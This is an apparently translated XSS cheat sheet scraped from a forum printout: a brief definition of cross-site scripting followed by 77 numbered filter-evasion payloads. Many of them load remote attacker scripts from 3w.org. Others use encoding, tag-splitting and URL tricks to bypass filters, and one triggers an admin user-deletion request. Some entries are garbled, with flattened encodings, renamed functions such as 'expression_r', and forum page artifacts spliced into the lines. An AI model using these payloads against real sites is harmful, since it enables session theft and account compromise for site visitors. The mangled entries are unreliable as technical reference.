1. What is
XSS?
The full name of XSS is Cross Site Scripting, which is cross-site scripting. XSS occurs when an unexpected script instruction appears and is executed during the process of the target user's browser rendering the HTML document on the target website.
Common
XSS attack methods
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS uses JavaScript commands
<IMG SRC=http://3w.org/XSS/xss.js/>
(3) IMG tags have no semicolons and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tags are not case sensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (must have a semicolon)
<IMG SRC=javascript:alert("XSS")>
(6) Fix defective IMG tags
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) formCharCode label (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) Unicode encoding of UTF-8 (calculator)
<IMG SRC=jav.. omitted.. S')>
(9) The 7-bit UTF-8 Unicode encoding does not have a semicolon (calculator)
<IMG SRC=jav.. omitted.. S')>
(10) Hexadecimal encoding also has no semicolon (calculator)
<IMG SRC=java.. omitted..XSS')>
(11) Embedded tags, separate Javascript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded coding tags to separate Javascript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line injection JavaScript, this is an extreme example of XSS
<IMG SRC="javascript:alert('XSS')">
(16) Resolve restricted characters (require the same page)
<script>z='document.'</script><script>z=z+'write("'</script><script>z=z+'<script'</script><script>z=z+' src =ht'</script><script>z=z+'tp://ww'</script><script>z=z+'w.shell'</script><script>z=z+'.net/1 .'</script><script>z=z+'js></sc'</script><script>z=z+'ript>")'</script><script>eval_r(z)</script>
(17) Blank character 12-7-1 T00LS-Powered by Discuz! Board
https://www.a.com/viewthread.php?action=printable&tid=15267 2/6perl -e'print "<IMG SRC=java\0script:alert(\"XSS\")>";'> out
(18) Null character 2, Null character basically has no effect in China. Because there is no place to use it
perl -e'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";'> out
(19) IMG tags before Spaces and meta
<IMG SRC=" javascript:alert('XSS');">
(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open bracket
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No end script tag (only Firefox and other browsers)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No end script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle bracket
<iframe src=http://3w.org/XSS.html <
(28) No single quotation mark Double quotation mark Semicolon
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
(29) JavaScript escaped filtering
\";alert('XSS');//
(30) End the Title tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31)Input Image
<INPUT SRC="javascript:alert('XSS');">
(32)BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33)BODY tag
<BODY('XSS')>
(34)IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35)IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36)BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37)STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39)List-style-image (list-style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40)IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41)META link url
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
(42)Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43)Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>12-7-1 T00LS-Powered by Discuz! Boardhttps://www.a.com/viewthread.php?action= printable&tid=15267 3/6
(44)Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45)TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46)DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47)Add extra characters after DIV background-image (1-32&34&39&160&8192-
8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48)DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">
(49) STYLE attribute split expression
<IMG STYLE="xss:expression_r(alert('XSS'))">
(50) Anonymous STYLE (composition: opening angle and beginning with a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">
(51)STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><ACLASS=XSS></A>
(52)IMG STYLE method
exppression(alert("XSS"))'>
(53)STYLE background
<STYLE><STYLEtype="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54)BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag, you can embed FLASH, which contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Use ActionScrpt in flash to mix into your XSS code
a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval_r(a+b+c+d);
(57) The XML namespace.HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss><?import namespace="xss" implementation="http://3w.org/XSS/xss.htc"><xss:xss>XSS</xss:xss></HTML>
(58) If you filter your JS, you can add JS code to the picture to use
<SCRIPT SRC=""></SCRIPT>
(59)IMG embedded commands, can execute arbitrary commands
<IMG SRC="http://www.a.com/a.php?a=b">
(60)IMG embedded command (a.jpg in the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Filter around symbols
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" "SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)12-7-1 T00LS-Po
wered by Discuz! Board
https://www.a.com/viewthread.php?action=printable&tid=15267 4/6<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT >
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP decimal
<A HREF="http://3232235521″>XSS</A>
(71) IP hexadecimal
<A HREF="http://0xc0.0xa8.0×00.0×01″>XSS</A>
(72) IP octal
<A HREF="http://0300.0250.0000.0001″>XSS</A>
(73) Mixed coding
<A HREF="http://6 6.000146.0×7.147/"">XSS</A>
(74) Saving [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Saving [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute point absolute DNS
<A HREF="http://www.google.com./">XSS</A>
(77)javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
